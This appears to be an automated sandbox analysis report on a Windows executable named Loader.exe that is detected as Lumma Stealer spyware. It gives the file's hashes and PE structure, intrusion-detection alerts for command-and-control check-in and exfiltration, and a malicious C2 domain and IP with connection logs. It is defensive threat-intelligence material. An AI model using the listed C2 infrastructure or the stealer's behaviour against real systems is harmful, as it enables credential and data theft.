https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | Loader.exe, 00000001.00000003.2568059409.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568126964.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568255337.00000000036FA000.00000004.00000800.00020000.00000000.sdmp | false | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | Loader.exe, 00000001.00000003.2614852902.0000000003775000.00000004.00000800.00020000.00000000.sdmp | false | high
https://ingreem-eilish.biz/apiC | Loader.exe, 00000001.00000002.2712486611.000000000140C000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | Loader.exe, 00000001.00000003.2568059409.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568126964.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568255337.00000000036FA000.00000004.00000800.00020000.00000000.sdmp | false | high
http://ocsp.rootca1.amazontrust.com0: | Loader.exe, 00000001.00000003.2614852902.0000000003775000.00000004.00000800.00020000.00000000.sdmp | false | high
https://ingreem-eilish.biz/h | Loader.exe, 00000001.00000003.2690435332.0000000001475000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://www.ecosia.org/newtab/ | Loader.exe, 00000001.00000003.2568059409.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568126964.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568255337.00000000036FA000.00000004.00000800.00020000.00000000.sdmp | false | high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | Loader.exe, 00000001.00000003.2616062233.00000000039E9000.00000004.00000800.00020000.00000000.sdmp | false | high
https://ingreem-eilish.biz:443/apiK | Loader.exe, 00000001.00000002.2712486611.00000000013D0000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://ac.ecosia.org/autocomplete?q= | Loader.exe, 00000001.00000003.2568059409.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568126964.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568255337.00000000036FA000.00000004.00000800.00020000.00000000.sdmp | false | high
https://ingreem-eilish.biz:443/api | Loader.exe, 00000001.00000002.2712486611.00000000013D0000.00000004.00000020.00020000.00000000.sdmp | false | unknown
http://x1.c.lencr.org/0 | Loader.exe, 00000001.00000003.2614852902.0000000003775000.00000004.00000800.00020000.00000000.sdmp | false | high
http://x1.i.lencr.org/0 | Loader.exe, 00000001.00000003.2614852902.0000000003775000.00000004.00000800.00020000.00000000.sdmp | false | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | Loader.exe, 00000001.00000003.2568059409.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568126964.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568255337.00000000036FA000.00000004.00000800.00020000.00000000.sdmp | false | high
http://crt.rootca1.amazontrust.com/rootca1.cer0? | Loader.exe, 00000001.00000003.2614852902.0000000003775000.00000004.00000800.00020000.00000000.sdmp | false | high
https://support.mozilla.org/products/firefoxgro.all | Loader.exe, 00000001.00000003.2616062233.00000000039E9000.00000004.00000800.00020000.00000000.sdmp | false | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | Loader.exe, 00000001.00000003.2568059409.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568126964.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568255337.00000000036FA000.00000004.00000800.00020000.00000000.sdmp | false | high
https://ingreem-eilish.biz/apiX | Loader.exe, 00000001.00000002.2712836874.000000000147C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2690412895.0000000001478000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://ingreem-eilish.biz:443/apiicrosoft | Loader.exe, 00000001.00000002.2712486611.00000000013D0000.00000004.00000020.00020000.00000000.sdmp | false | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.90.135 | ingreem-eilish.biz | United States | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579012
Start date and time: 2024-12-20 17:40:03 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 50s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 3
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Loader.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@1/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 88%
• Number of executed functions: 34
• Number of non-executed functions: 131
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): dllhost.exe, WMIADAP.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Loader.exe
Time | Type | Description
11:41:44 | API Interceptor | 7x Sleep call for process: Loader.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
104.21.90.135 | ryidtyjrh | malicious | Unknown
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | Sentinelled.vbs | malicious | Unknown | 104.21.86.72
CLOUDFLARENETUS | nshkarm.elf | malicious | Mirai | 104.25.87.101
CLOUDFLARENETUS | hBBxlxfQ3F.exe | malicious | LummaC, Stealc | 172.67.197.170
CLOUDFLARENETUS | gf3yK6i4OX.exe | malicious | LummaC | 104.21.21.99
CLOUDFLARENETUS | 0WO49yZcDA.exe | malicious | LummaC | 104.21.21.99
CLOUDFLARENETUS | uDTW3VjJJT.exe | malicious | LummaC, Stealc | 104.21.21.99
CLOUDFLARENETUS | u1z7S3hr06.exe | malicious | LummaC, Stealc | 104.21.21.99
CLOUDFLARENETUS | zhQFKte2vX.exe | malicious | LummaC | 172.67.197.170
CLOUDFLARENETUS | http://www.eventcreate.com/e/you-have-received-a-new-doc | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | ddySsHnC6l.exe | malicious | LummaC | 172.67.197.170
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | hBBxlxfQ3F.exe | malicious | LummaC, Stealc | 104.21.90.135
a0e9f5d64349fb13191bc781f81f42e1 | gf3yK6i4OX.exe | malicious | LummaC | 104.21.90.135
a0e9f5d64349fb13191bc781f81f42e1 | 0WO49yZcDA.exe | malicious | LummaC | 104.21.90.135
a0e9f5d64349fb13191bc781f81f42e1 | uDTW3VjJJT.exe | malicious | LummaC, Stealc | 104.21.90.135
a0e9f5d64349fb13191bc781f81f42e1 | u1z7S3hr06.exe | malicious | LummaC, Stealc | 104.21.90.135
a0e9f5d64349fb13191bc781f81f42e1 | zhQFKte2vX.exe | malicious | LummaC | 104.21.90.135
a0e9f5d64349fb13191bc781f81f42e1 | ddySsHnC6l.exe | malicious | LummaC | 104.21.90.135
a0e9f5d64349fb13191bc781f81f42e1 | NAliwxUTJ4.exe | malicious | LummaC | 104.21.90.135
a0e9f5d64349fb13191bc781f81f42e1 | XNtOBQ5NHr.exe | malicious | LummaC, Stealc | 104.21.90.135
a0e9f5d64349fb13191bc781f81f42e1 | Z8oTIWCyDE.exe | malicious | LummaC | 104.21.90.135
                                                                                      No context
                                                                                      No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.256587943823873
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Loader.exe
File size: 3'208'704 bytes
MD5: 99604ef7ebf56a566a0cdb4b6bb0fa08
SHA1: f16ce4bd1ba5eba29494ff69ac8d263e2f9110b7
SHA256: cca815d086ab89c36262865aaa9e0dd7dc02830aec4e6a3fa8b662b65adf7ce0
SHA512: 97a518db9a2dbeaf8c2539135fdd19fafdb0ddad2cb2f14a596587db623a971f805b4c957801fa7db05078673545eb4ee365683944d70aba507ddc899d0fe7a2
SSDEEP: 98304:861nv8BvCX4CvockvGlOvB1gy7z/irvf1cF597EIcthe9Acv0ezr72U:861Dfof1vX/ibNcF5dhCGN
TLSH: 0CE56BBC1000CD36CB17C1B5B2032ACF7B6D26F2D99FB022679495EAA85F6CE49485D7
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............A...A...A...@...A...@+..A...@...A.4.@...A.4.@...A.4.@...A...@...A...A...A&4.@...A&46A...A&4.@...ARich...A...............
Icon Hash: 2c361212c3aced39
Entrypoint: 0x6d4326
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x675D4DF9 [Sat Dec 14 09:20:57 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: e990cd25aa53852c85f149fcb0678c1e
                                                                                      Instruction
                                                                                      call 00007F5E38B642DAh
                                                                                      jmp 00007F5E38B63D8Fh
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      push 00000000h
                                                                                      call dword ptr [006E100Ch]
                                                                                      push dword ptr [ebp+08h]
                                                                                      call dword ptr [006E1008h]
                                                                                      push C0000409h
                                                                                      call dword ptr [006E1010h]
                                                                                      push eax
                                                                                      call dword ptr [006E1014h]
                                                                                      pop ebp
                                                                                      ret
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      sub esp, 00000324h
                                                                                      push 00000017h
                                                                                      call dword ptr [006E1018h]
                                                                                      test eax, eax
                                                                                      je 00007F5E38B63F17h
                                                                                      push 00000002h
                                                                                      pop ecx
                                                                                      int 29h
                                                                                      mov dword ptr [006E7A60h], eax
                                                                                      mov dword ptr [006E7A5Ch], ecx
                                                                                      mov dword ptr [006E7A58h], edx
                                                                                      mov dword ptr [006E7A54h], ebx
                                                                                      mov dword ptr [006E7A50h], esi
                                                                                      mov dword ptr [006E7A4Ch], edi
                                                                                      mov word ptr [006E7A78h], ss
                                                                                      mov word ptr [006E7A6Ch], cs
                                                                                      mov word ptr [006E7A48h], ds
                                                                                      mov word ptr [006E7A44h], es
                                                                                      mov word ptr [006E7A40h], fs
                                                                                      mov word ptr [006E7A3Ch], gs
                                                                                      pushfd
                                                                                      pop dword ptr [006E7A70h]
                                                                                      mov eax, dword ptr [ebp+00h]
                                                                                      mov dword ptr [006E7A64h], eax
                                                                                      mov eax, dword ptr [ebp+04h]
                                                                                      mov dword ptr [006E7A68h], eax
                                                                                      lea eax, dword ptr [ebp+08h]
                                                                                      mov dword ptr [006E7A74h], eax
                                                                                      mov eax, dword ptr [ebp-00000324h]
                                                                                      mov dword ptr [006E79B0h], 00010001h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e68c4 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2e9000 | 0xfab9 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2f9000 | 0x199dc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x2e5d80 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2e5cc0 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2e1000 | 0x108 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2df092 | 0x2df200 | dc72ebcfb8ff7768f22fefca4be8ff49 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x2e1000 | 0x5eb2 | 0x6000 | e11117728ebcbec4e2528fb736829857 | False | 0.4133707682291667 | data | 4.7342482849867356 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x2e7000 | 0x1498 | 0xa00 | 2e3d907102a146e9652e9b10f1b5f1e4 | False | 0.18359375 | data | 2.3274080229263867 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x2e9000 | 0xfab9 | 0xfc00 | cebbbcdddafd8703a3201723b53ac01d | False | 0.9126519097222222 | data | 7.585610831148343 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x2f9000 | 0x199dc | 0x19a00 | fd6c7e2d41b84e2eada46eb03bb3b9d4 | False | 0.7238090701219512 | data | 6.845556888592954 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x2e9430 | 0xd3c4 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9950564450675127
RT_MENU | 0x2f67f4 | 0x1a0 | data | | | 0.6177884615384616
RT_MENU | 0x2f6994 | 0x2aa | data | | | 0.5630498533724341
RT_DIALOG | 0x2f6c40 | 0x2e0 | data | | | 0.5339673913043478
RT_DIALOG | 0x2f6f20 | 0x20c | data | | | 0.6125954198473282
RT_DIALOG | 0x2f712c | 0x318 | data | | | 0.5429292929292929
RT_DIALOG | 0x2f7444 | 0x200 | data | | | 0.546875
RT_DIALOG | 0x2f7644 | 0x2d0 | data | | | 0.5513888888888889
RT_STRING | 0x2f7914 | 0x13c | data | | | 0.6329113924050633
RT_STRING | 0x2f7a50 | 0x194 | data | | | 0.599009900990099
RT_STRING | 0x2f7be4 | 0x1a4 | data | | | 0.5833333333333334
RT_STRING | 0x2f7d88 | 0x1ac | data | | | 0.5841121495327103
RT_STRING | 0x2f7f34 | 0x198 | data | | | 0.6151960784313726
RT_MESSAGETABLE | 0x2f80cc | 0x360 | Matlab v4 mat-file (little endian) 9\001, rows 289, columns 297, imaginary | | | 0.5057870370370371
RT_MESSAGETABLE | 0x2f842c | 0x1fc | Matlab v4 mat-file (little endian) )\001, rows 276, columns 281, imaginary | | | 0.5551181102362205
RT_GROUP_ICON | 0x2f8628 | 0x14 | data | | | 1.1
RT_VERSION | 0x2f863c | 0x300 | data | English | United States | 0.5091145833333334
RT_MANIFEST | 0x2f893c | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
DLL | Import
KERNEL32.dll | VirtualProtect, WriteConsoleW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, EncodePointer, RaiseException, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapFree, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, LCMapStringW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, SetFilePointerEx, CreateFileW, CloseHandle, DecodePointer
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-20T17:41:44.381468+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49756 | 104.21.90.135 | 443 | TCP
2024-12-20T17:41:45.098343+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49756 | 104.21.90.135 | 443 | TCP
2024-12-20T17:41:45.098343+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49756 | 104.21.90.135 | 443 | TCP
2024-12-20T17:41:46.378510+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49761 | 104.21.90.135 | 443 | TCP
2024-12-20T17:41:47.097956+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.5 | 49761 | 104.21.90.135 | 443 | TCP
2024-12-20T17:41:47.097956+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49761 | 104.21.90.135 | 443 | TCP
2024-12-20T17:41:48.661686+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49767 | 104.21.90.135 | 443 | TCP
2024-12-20T17:41:50.819969+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49773 | 104.21.90.135 | 443 | TCP
2024-12-20T17:41:51.622335+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.5 | 49773 | 104.21.90.135 | 443 | TCP
2024-12-20T17:41:53.431410+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49780 | 104.21.90.135 | 443 | TCP
2024-12-20T17:41:55.900795+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49786 | 104.21.90.135 | 443 | TCP
2024-12-20T17:41:57.871064+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49792 | 104.21.90.135 | 443 | TCP
2024-12-20T17:42:00.820993+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49799 | 104.21.90.135 | 443 | TCP
2024-12-20T17:42:01.648299+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49799 | 104.21.90.135 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 20, 2024 17:41:43.150978088 CET | 49756 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:43.151032925 CET | 443 | 49756 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:43.151204109 CET | 49756 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:43.152499914 CET | 49756 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:43.152518034 CET | 443 | 49756 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:44.381395102 CET | 443 | 49756 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:44.381468058 CET | 49756 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:44.389568090 CET | 49756 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:44.389597893 CET | 443 | 49756 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:44.389830112 CET | 443 | 49756 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:44.437151909 CET | 49756 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:44.463648081 CET | 49756 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:44.463676929 CET | 49756 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:44.463778973 CET | 443 | 49756 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:45.098329067 CET | 443 | 49756 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:45.098433018 CET | 443 | 49756 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:45.098543882 CET | 49756 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:45.106513023 CET | 49756 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:45.106543064 CET | 443 | 49756 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:45.106555939 CET | 49756 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:45.106563091 CET | 443 | 49756 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:45.154830933 CET | 49761 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:45.154881954 CET | 443 | 49761 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:45.154966116 CET | 49761 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:45.155304909 CET | 49761 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:45.155318975 CET | 443 | 49761 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:46.378355026 CET | 443 | 49761 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:46.378509998 CET | 49761 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:46.380244017 CET | 49761 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:46.380255938 CET | 443 | 49761 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:46.380500078 CET | 443 | 49761 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:46.382421970 CET | 49761 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:46.382421970 CET | 49761 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:46.382494926 CET | 443 | 49761 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:47.097956896 CET | 443 | 49761 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:47.098021030 CET | 443 | 49761 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:47.098093987 CET | 443 | 49761 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:47.098108053 CET | 49761 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:47.098129034 CET | 443 | 49761 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:47.098181963 CET | 49761 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:47.098189116 CET | 443 | 49761 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:47.106517076 CET | 443 | 49761 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:47.106760979 CET | 49761 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:47.106776953 CET | 443 | 49761 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:47.115153074 CET | 443 | 49761 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:47.115238905 CET | 49761 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:47.115251064 CET | 443 | 49761 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:47.123719931 CET | 443 | 49761 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:47.123791933 CET | 49761 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:47.123800993 CET | 443 | 49761 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:47.171585083 CET | 49761 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:47.171601057 CET | 443 | 49761 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:47.218620062 CET | 49761 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:47.218631983 CET | 443 | 49761 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:47.265394926 CET | 49761 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:47.291074038 CET | 443 | 49761 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:47.291187048 CET | 443 | 49761 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:47.291413069 CET | 49761 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:47.291454077 CET | 49761 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:47.291471004 CET | 443 | 49761 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:47.291481018 CET | 49761 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:47.291486979 CET | 443 | 49761 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:47.444859028 CET | 49767 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:47.444899082 CET | 443 | 49767 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:47.444998980 CET | 49767 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:47.445322037 CET | 49767 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:47.445338964 CET | 443 | 49767 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:48.661549091 CET | 443 | 49767 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:48.661685944 CET | 49767 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:48.663085938 CET | 49767 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:48.663103104 CET | 443 | 49767 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:48.663352013 CET | 443 | 49767 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:48.664743900 CET | 49767 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:48.664900064 CET | 49767 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:48.664932013 CET | 443 | 49767 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:49.448012114 CET | 443 | 49767 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:49.448278904 CET | 443 | 49767 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:49.448332071 CET | 49767 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:49.448359966 CET | 49767 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:49.574582100 CET | 49773 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:49.574646950 CET | 443 | 49773 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:49.574733973 CET | 49773 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:49.575045109 CET | 49773 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:49.575064898 CET | 443 | 49773 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:50.819829941 CET | 443 | 49773 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:50.819968939 CET | 49773 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:50.821238995 CET | 49773 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:50.821250916 CET | 443 | 49773 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:50.821517944 CET | 443 | 49773 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:50.822808027 CET | 49773 | 443 | 192.168.2.5 | 104.21.90.135
